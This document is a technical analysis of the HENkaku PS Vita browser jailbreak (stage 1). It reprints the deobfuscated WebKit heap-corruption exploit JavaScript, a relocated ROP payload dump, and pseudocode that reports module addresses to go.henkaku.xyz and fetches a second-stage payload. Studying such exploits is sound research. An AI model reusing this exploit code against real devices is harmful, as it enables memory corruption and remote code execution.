Information has been reorganized to reflect the original developers' naming scheme.
HENkaku - Stage 1
Visiting http://henkaku.xyz and pressing the "Install" button triggers a server-side user-agent check.
If the browser's user-agent matches that of a PS Vita/PSTV on the latest firmware version (3.60), the user is redirected to http://go.henkaku.xyz and the exploit is deployed.
This exploit re-uses elements from older public exploits (the heap-spraying method, the sort() bug, and scrollLeft attribute manipulation) and pairs them with a new heap corruption technique.
Team molecule renamed variables and methods to add a simple obfuscation layer to the HTML code.
Partially reversed HTML:
<script src='payload.js'></script> | |
<script> | |
var r, a, e, t, n, o, l, i, f, v, s, c; | |
var u, y, w, p, d, g, h, k, b; | |
var A, U; | |
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/ | |
m /= 4; /* 476 */ | |
var _dview = null; | |
/* | |
Wrap two uint32s into double precision | |
*/ | |
function u2d(low, hi)
{
    /*
    Pack two unsigned 32-bit words into one IEEE-754 double.

    `hi` is written at byte 0 and `low` at byte 4 of the shared scratch
    DataView; DataView defaults to big-endian, so `hi` becomes the upper
    32 bits of the double and `low` the lower 32 bits. Returns the float64
    read back from those same 8 bytes.

    The module-level `_dview` scratch buffer is allocated lazily on first
    use; it is shared with d2u() and is also used directly by later code
    in this listing.
    */
    if (!_dview)
        _dview = new DataView(new ArrayBuffer(16));
    _dview.setUint32(0, hi);
    _dview.setUint32(4, low);
    return _dview.getFloat64(0)
}
/* | |
Unwrap uints from double | |
*/ | |
function d2u(d)
{
    /*
    Unpack a double into its two unsigned 32-bit halves.

    Inverse of u2d(): writes `d` at byte 0 of the shared scratch DataView
    and reads the two big-endian words back, returning
    {low: bytes 4..7, hi: bytes 0..3}. Allocates the module-level `_dview`
    buffer lazily if u2d() has not already done so.
    */
    if (!_dview)
        _dview = new DataView(new ArrayBuffer(16));
    _dview.setFloat64(0, d);
    return {low:_dview.getUint32(4),hi:_dview.getUint32(0)}
}
// Temporary space to store Element object | |
var aspace_temp = new Uint32Array(1024); | |
var word1 = 0; | |
var word2 = 0; | |
function swap(offset)
{
    /*
    Read two consecutive 32-bit words from `aspace32` starting at byte
    offset `offset` and fold a 16-bit field out of each one: bits 0-11
    are kept and bits 16-19 are moved down to bits 12-15. The field from
    the first word becomes the low half of the result and the field from
    the second word the high half; `>>> 0` forces an unsigned 32-bit
    result. Despite the name, nothing is swapped.

    Side effects: the two raw words are stored in the module-level
    `word1` and `word2` before being combined.

    NOTE(review): the mask layout (bits 0-11 plus bits 16-19) matches the
    16-bit immediate field of an ARM-mode MOVW/MOVT encoding, which would
    fit the prose's mention of reading import stubs -- inferred from the
    masks, not stated in the listing. `offset` is assumed to be a multiple
    of 4, since `offset/4` is used directly as an array index.
    */
    word1 = aspace32[offset/4];
    word2 = aspace32[offset/4 + 1];
    return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
}
r = 0x4000; | |
textareas = new Array(r); | |
aspace_arr = new Array(r); | |
t = 0x1344; | |
n = 0x66656463; | |
o = 0x55555555; | |
for (var i = 0; i < aspace_arr.length; ++i) | |
{ | |
aspace_arr[i] = new Uint32Array(0x1344/4); | |
var e = document.createElement("textarea"); | |
e.rows = 0x66656463; | |
textareas[i] = e; | |
} | |
/* | |
Spray memory with Element objects | |
*/ | |
for (var i = 0; i < 1024; ++i) | |
{ | |
var e = document.createElement("textarea"); | |
e.rows = 0x66656463; | |
textareas.push(e); | |
} | |
var N = 0x3000; | |
var W = Array.prototype.constructor.apply(null,new Array(0x3000)); | |
var j = 2048; | |
var q = new Array(2048); | |
var z = {}; | |
var C = new Array(256); | |
z.toString = function() | |
{ | |
W.push(12345); | |
for (var r = 0; r < C.length; ++r) | |
{ | |
var a = Array.prototype.constructor.apply(null, q); | |
a[0] = 0; | |
a[1] = 1; | |
a[2] = 2; | |
C[r] = a; | |
} return"" | |
}; | |
W[0] = z; | |
var G = u2d(0x80000000, 0x80000000); | |
for (var i = 1; i < 8192; ++i) | |
W[i] = G; | |
W.sort(); | |
contents = ""; | |
cur = 0; | |
z.toString = function(){}; | |
var I = null; | |
for (var i = 0; i < C.length; ++i) | |
{ | |
if(C[i].length != j) | |
{ | |
I = C[i]; | |
break; | |
} | |
} | |
var count = 0x20000000 - 0x11000; | |
for(; ; count--) | |
{ | |
if(I[count] != 0) | |
{ | |
_dview.setFloat64(0, I[J]); | |
if (_dview.getUint32(0) == t/4) | |
{ | |
_dview.setUint32(0, 0xEFFFFFE0); | |
I[J] = _dview.getFloat64(0); | |
_dview.setFloat64(0, I[J - 2]); | |
v = _dview.getUint32(4); | |
_dview.setUint32(4, 0); | |
_dview.setUint32(0, 0x80000000); | |
I[J-2] = _dview.getFloat64(0); | |
break; | |
} | |
} | |
} | |
target_aspace = null; | |
for (var i = 0; i < aspace_arr.length; ++i) | |
{ | |
if(aspace_arr[i].byteLength != t) | |
{ | |
target_aspace = aspace_arr[i]; | |
break; | |
} | |
} | |
if (!target_aspace) | |
{ | |
alert("failed"); | |
while(1){}; | |
} | |
var aspace32 = target_aspace; | |
var fkvtable = v; | |
f = v; | |
/* | |
Find one of the sprayed Element objects in memory | |
by looking for the rows of the object | |
*/ | |
for (var addr = f/4; addr < f/4 + 0x4000; ++addr) | |
{ | |
if (aspace32[addr] == 0x66656463) | |
{ | |
aspace32[addr] = 0x55555555; | |
textarea_addr = addr * 4; | |
found_element = true; | |
break; | |
} | |
} | |
if (!found_element) | |
{ | |
alert("Did not find Element signature"); | |
while(1){}; | |
} | |
/* | |
Change the rows of the Element object then scan the array of | |
sprayed objects to find an object whose rows have been changed | |
*/ | |
var found_corrupted = false; | |
var corrupted_textarea; | |
for (var i = 0; i < textareas.length; ++i) | |
{ | |
if(textareas[i].rows == 0x55555555) | |
{ | |
corrupted_textarea = textareas[i]; | |
found_corrupted = true; | |
break; | |
} | |
} | |
if (!found_corrupted) | |
{ | |
alert("Did not find corrupted textarea"); | |
while(1){}; | |
} | |
var vtidx = textarea_addr - 0x70; | |
var textareavptr = aspace32[vtidx/4]; | |
scewkbase = textareavptr - 0xABB65C; | |
scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49; | |
scekernbase = swap(scewkbase + 0x85F464) - 0x9031; | |
p = swap(scewkbase + 0x85D2E4) - 0x22D65; | |
d = swap(p + 0x2C688C) - 0x9E5; | |
g = swap(d + 0x3BC4) - 0xDC2D; | |
scenetbase = swap(scewkbase + 0x85F414) - 0x23ED; | |
k = swap(g + 0x18BF4) - 0xD59; | |
b = swap(k + 0x9AB8) - 0x49CD; | |
// Copy vtable | |
for (var i = 0; i < 64; i++) | |
aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i]; | |
aspace32[vtidx/4] = fkvtable; | |
// Save Element object | |
for (var i = 0; i < 0x30; ++i) | |
aspace_temp[i] = aspace32[vtidx/4 + i]; | |
// Call setjmp | |
aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1; | |
// Undefine scrollLeft | |
corrupted_textarea.scrollLeft = 0; | |
// Save payload address (jmp context) | |
payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0; | |
payload_addr -= 0xEF818; | |
// Restore Element object | |
for (var i = 0; i < 0x30; ++i) | |
aspace32[vtidx/4 + i] = aspace_temp[i]; | |
payload_stack = payload_addr + 0x40; | |
payload_code = payload_addr + 0x10000; | |
payload_off = payload_addr/4; | |
// Build ROP payload | |
for (var i = 0; i < payload.length; ++i,++payload_off) | |
{ | |
// Reached the end of ROP header (first 0x770 bytes) | |
if (i == 476) | |
payload_off = payload_code/4; | |
switch(relocs[i]) | |
{ | |
case 0: | |
aspace32[payload_off] = payload[i]; | |
break; | |
case 1: | |
aspace32[payload_off] = payload[i] + payload_stack; | |
break; | |
case 2: | |
aspace32[payload_off] = payload[i] + scewkbase; | |
break; | |
case 3: | |
aspace32[payload_off] = payload[i] + scekernbase; | |
break; | |
case 4: | |
aspace32[payload_off] = payload[i] + scelibcbase; | |
break; | |
case 5: | |
aspace32[payload_off] = payload[i] + g; | |
break; | |
case 6: | |
aspace32[payload_off] = payload[i] + scenetbase; | |
break; | |
case 7: | |
aspace32[payload_off] = payload[i] + b; | |
break; | |
default: | |
alert("wtf?"); | |
alert(i + " " + relocs[i]) | |
} | |
} | |
// Trigger ROPchain | |
aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8; /* LDM R1 gadget */ | |
var rchainaddr = fkvtable + 0x100; | |
aspace32[rchainaddr/4 + 5] = payload_code; | |
aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1; | |
alert("Welcome to HENkaku!"); | |
// Set scrollLeft to ROP chain | |
corrupted_textarea.scrollLeft = rchainaddr; | |
alert("that's it"); | |
</script> |
As in older exploits, this makes it possible to corrupt an object's vtable and achieve ROP inside the SceWebkit module.
Offsets for libraries and relevant ROP gadgets are
fetched from a javascript file (http://go.henkaku.xyz/payload.js) during
the last stage of the exploit.
Team molecule implemented a dynamic method that relocates gadget and function offsets for each module once that module's base address has been found (by looking at SceWebkit's import stubs).
The payload.js file contains two arrays: one holding the payload's binary data and another holding the relocation type of each word.
By combining these two arrays, the exploit reads the payload and relocates every code offset into its target module's address space by adding that module's base address to it:
Relocation type 0 -> Plain data stored inside the ROP space itself. No relocation needed.
Relocation type 1 -> Offset inside the ROP payload's stack.
Relocation type 2 -> Offset inside the SceWebkit module.
Relocation type 3 -> Offset inside the SceLibKernel module.
Relocation type 4 -> Offset inside the SceLibc module.
Relocation type 5 -> Offset inside the SceLibHttp module.
Relocation type 6 -> Offset inside the SceNet module.
Relocation type 7 -> Offset inside the SceAppMgr module.
Payload's generated binary data:
[HEADER] (0x40 bytes) | |
0x524f507e -> ROP~ | |
0x01000100 -> Version | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x00000730 -> No reloc | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x000003F8 -> No reloc | |
0x00000000 -> NULL | |
0x000C048B -> No reloc | |
0x00000000 -> NULL | |
0x000005E8 -> No reloc | |
0x00000000 -> NULL | |
0x00000038 -> No reloc | |
0x00000000 -> NULL | |
[STACK] (from 0x40 to 0x770) | |
At 0x6F8 contains the strings: | |
"http://go.henkaku.xyz/x" | |
"st2" | |
"?a1=%x" | |
"&a2=%x&a3=%x&a4=%x&" | |
"&a5=%x&a6=%x&a7=%x&" | |
"ldr" | |
[CODE] (from 0x770 to 0xB68) | |
0x008e27c5 -> Reloc to SceWebkit | |
0x00000040 -> No reloc | |
0x00000028 -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008dd9b5 -> Reloc to SceWebkit | |
0x000000ff -> No reloc | |
0x000003f0 -> Reloc to stack | |
0x00000028 -> Reloc to stack | |
0x00000000 -> No reloc | |
0x0000675c -> Reloc to SceLibKernel | |
0x00000000 -> No reloc | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x000001b8 -> No reloc | |
0x000004f8 -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008e7445 -> Reloc to SceWebkit | |
0x00000444 -> Reloc to stack | |
0x000004f8 -> Reloc to stack | |
0x000695b1 -> Reloc to SceWebkit | |
0x0000676c -> Reloc to SceLibKernel | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008dd9b5 -> Reloc to SceWebkit | |
0x000006d8 -> Reloc to stack | |
0x000054c8 -> Reloc to SceWebkit | |
0x10000100 -> No reloc | |
0x00600000 -> No reloc | |
0x0000acc9 -> Reloc to SceLibKernel | |
0x00000000 -> No reloc | |
0x000bfb91 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x00895285 -> Reloc to SceWebkit | |
0x00000004 -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x0000007c -> No reloc | |
0x00000034 -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008e7445 -> Reloc to SceWebkit | |
0x00000004 -> Reloc to stack | |
0x00000034 -> Reloc to stack | |
0x000695b1 -> Reloc to SceWebkit | |
0x0000a791 -> Reloc to SceLibKernel | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e7445 -> Reloc to SceWebkit | |
0x00000068 -> Reloc to stack | |
0x00001000 -> No reloc | |
0x000695b1 -> Reloc to SceWebkit | |
0x00130a15 -> Reloc to SceWebkit | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x00895285 -> Reloc to SceWebkit | |
0x0000001c -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x000000bc -> Reloc to stack | |
0x000006b8 -> Reloc to stack | |
0x00006775 -> Reloc to SceLibc | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008dd9b5 -> Reloc to SceWebkit | |
0x0000001c -> Reloc to stack | |
0x00000000 -> No reloc | |
0x008e27c5 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x000fcdbb -> Reloc to SceWebkit | |
0x000695b1 -> Reloc to SceWebkit | |
0x000065bd -> Reloc to SceLibc | |
0x0021a295 -> Reloc to SceWebkit | |
0x000002c4 -> Reloc to stack | |
0x00000100 -> No reloc | |
0x000006e4 -> Reloc to stack | |
0x001c6467 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x000000bc -> Reloc to stack | |
0x000002c4 -> Reloc to stack | |
0x00006775 -> Reloc to SceLibc | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008dd9b5 -> Reloc to SceWebkit | |
0x000002c4 -> Reloc to stack | |
0x00000100 -> No reloc | |
0x000006f0 -> Reloc to stack | |
0x00000000 -> Reloc to SceWebkit | |
0x000065bd -> Reloc to SceLibc | |
0x00000000 -> No reloc | |
0x000bfb91 -> Reloc to SceWebkit | |
0x00000000 -> Reloc to SceLibKernel | |
0x00000000 -> Reloc to SceLibc | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x000000bc -> Reloc to stack | |
0x000002c4 -> Reloc to stack | |
0x00006775 -> Reloc to SceLibc | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008dd9b5 -> Reloc to SceWebkit | |
0x000002c4 -> Reloc to stack | |
0x00000100 -> No reloc | |
0x0000070c -> Reloc to stack | |
0x00000000 -> Reloc to Unk5 | |
0x000065bd -> Reloc to SceLibc | |
0x00000000 -> No reloc | |
0x000bfb91 -> Reloc to SceWebkit | |
0x00000000 -> Reloc to SceNet | |
0x00000000 -> Reloc to Unk7 | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x000000bc -> Reloc to stack | |
0x000002c4 -> Reloc to stack | |
0x00006775 -> Reloc to SceLibc | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x0091b9bd -> Reloc to SceWebkit | |
0x00010000 -> No reloc | |
0x000092fd -> Reloc to Unk5 | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008dd9b5 -> Reloc to SceWebkit | |
0x00000728 -> Reloc to stack | |
0x00000002 -> No reloc | |
0x00000001 -> No reloc | |
0x00000000 -> No reloc | |
0x0000947b -> Reloc to Unk5 | |
0x00000000 -> No reloc | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008dbdd5 -> Reloc to SceWebkit | |
0x000000bc -> Reloc to stack | |
0x00000000 -> No reloc | |
0x0000950b -> Reloc to Unk5 | |
0x0010665d -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x00860637 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000000bc -> Reloc to stack | |
0x00000000 -> No reloc | |
0x000095ff -> Reloc to Unk5 | |
0x000bfb91 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x00895285 -> Reloc to SceWebkit | |
0x00000010 -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x00000010 -> Reloc to stack | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x000695b1 -> Reloc to SceWebkit | |
0x00009935 -> Reloc to Unk5 | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x00884b85 -> Reloc to SceWebkit | |
0x00600000 -> No reloc | |
0x00927215 -> Reloc to SceWebkit | |
0x0000001c -> Reloc to stack | |
0x000698fb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x00927215 -> Reloc to SceWebkit | |
0x00000010 -> Reloc to stack | |
0x000695b1 -> Reloc to SceWebkit | |
0x00009983 -> Reloc to Unk5 | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008e7445 -> Reloc to SceWebkit | |
0x0000001c -> Reloc to stack | |
0x000003e0 -> Reloc to stack | |
0x000695b1 -> Reloc to SceWebkit | |
0x00106fc5 -> Reloc to SceWebkit | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x000003e4 -> Reloc to stack | |
0x00106fc5 -> Reloc to SceWebkit | |
0x00014a79 -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x00000004 -> Reloc to stack | |
0x0000001c -> No reloc | |
0x000003cc -> Reloc to stack | |
0x000695b1 -> Reloc to SceWebkit | |
0x0000a789 -> Reloc to SceLibKernel | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit | |
0x008e27c5 -> Reloc to SceWebkit | |
0x00000004 -> Reloc to stack | |
0x00000000 -> No reloc | |
0x00000000 -> No reloc | |
0x000695b1 -> Reloc to SceWebkit | |
0x000016fd -> Reloc to SceLibKernel | |
0x000fcdbb -> Reloc to SceWebkit | |
0x00000000 -> No reloc | |
0x000c048b -> Reloc to SceWebkit | |
0x000c048b -> Reloc to SceWebkit |
This payload is responsible for a few things, including:
// Do stuff | |
... | |
// Create a new thread for the second payload | |
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000); | |
// Do stuff | |
... | |
// Construct the arguments for fetching the second payload | |
strcpy(stack_base + 0x000000BC, "http://go.henkaku.xyz/x"); | |
snprintf(stack_base + 0x000002C4, 0x00000100, "?a1=%x", stack_base); | |
strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); | |
snprintf(stack_base + 0x000002C4, 0x00000100, "&a2=%x&a3=%x&a4=%x&", SceWebkit_base, SceLibKernel_base, SceLibc_base); | |
strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); | |
snprintf(stack_base + 0x000002C4, 0x00000100, "&a5=%x&a6=%x&a7=%x&", SceLibHttp_base, SceNet_base, SceDriverUser_base); | |
strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4); | |
// Do stuff | |
... | |
// Send HTTP requests to fetch the second payload | |
SceLibHttp_92fd(0x00010000); | |
int http_buf = SceLibHttp_947b("ldr", 0x00000002, 0x00000001); | |
SceLibHttp_950b(http_buf, stack_base + 0x000000BC, 0x00000000); | |
int http_req = SceLibHttp_95ff(http_buf, 0x00000000, stack_base + 0x000000BC); | |
SceLibHttp_9935(http_req, 0x00000000, 0x00000000); | |
SceLibHttp_9983(http_req); | |
// Do stuff | |
... |
Once the payload has finished, an HTTP request is sent to the server using the following template:
http://go.henkaku.xyz/x?a1=stack_base&a2=webkit_base&a3=libkernel_base&a4=libc_base&&a5=libhttp_base&a6=net_base&a7=appmgr_base&
Example:
http://go.henkaku.xyz/x?a1=89f02000&a2=81b009a0&a3=e000dd00&a4=811c0cc0&&a5=e0607c80&a6=e01302b0&a7=e0047bf0&
The "x" script on the server side collects the base
addresses for each module and generates a second payload to be run on
the Vita.
This second payload is composed of another ROP chain and obfuscated ARM code.
A preliminary analysis of this payload reveals a few interesting things:
strcpy(stack_base + 0x000086B4, "sdstor0:"); | |
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext"); | |
// Do stuff | |
... | |
strcpy(stack_base + 0x000086E4, "molecule0:"); | |
SceLibKernel_a4ad("molecule0:"); | |
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014); | |
// Do stuff | |
... | |
int thread1_id = sceKernelCreateThread("pln", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x000003FF, 0x00000000); | |
SceLibKernel_a791(thread1_id, 0x7C); | |
// Do stuff | |
... | |
int thread2_id = sceKernelCreateThread("mhm", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000); | |
// Do stuff | |
... | |
SceNet_27E1("x", 0x00000002, 0x00000001); | |
SceNet_27E1("x", 0x00000002, 0x00000001); | |
SceNet_27E1("x", 0x00000002, 0x00000001); | |
SceNet_27E1("x", 0x00000002, 0x00000001); | |
SceNet_27E1("x", 0x00000002, 0x00000001); | |
// Do stuff | |
... | |
SceNet_27E1("sss", 0x00000002, 0x00000001); | |
SceNet_27E1("tst", 0x00000002, 0x00000007); | |
SceNet_27E1("tmp", 0x00000002, 0x00000001); | |
// Do stuff | |
... |
Next up, stage 2!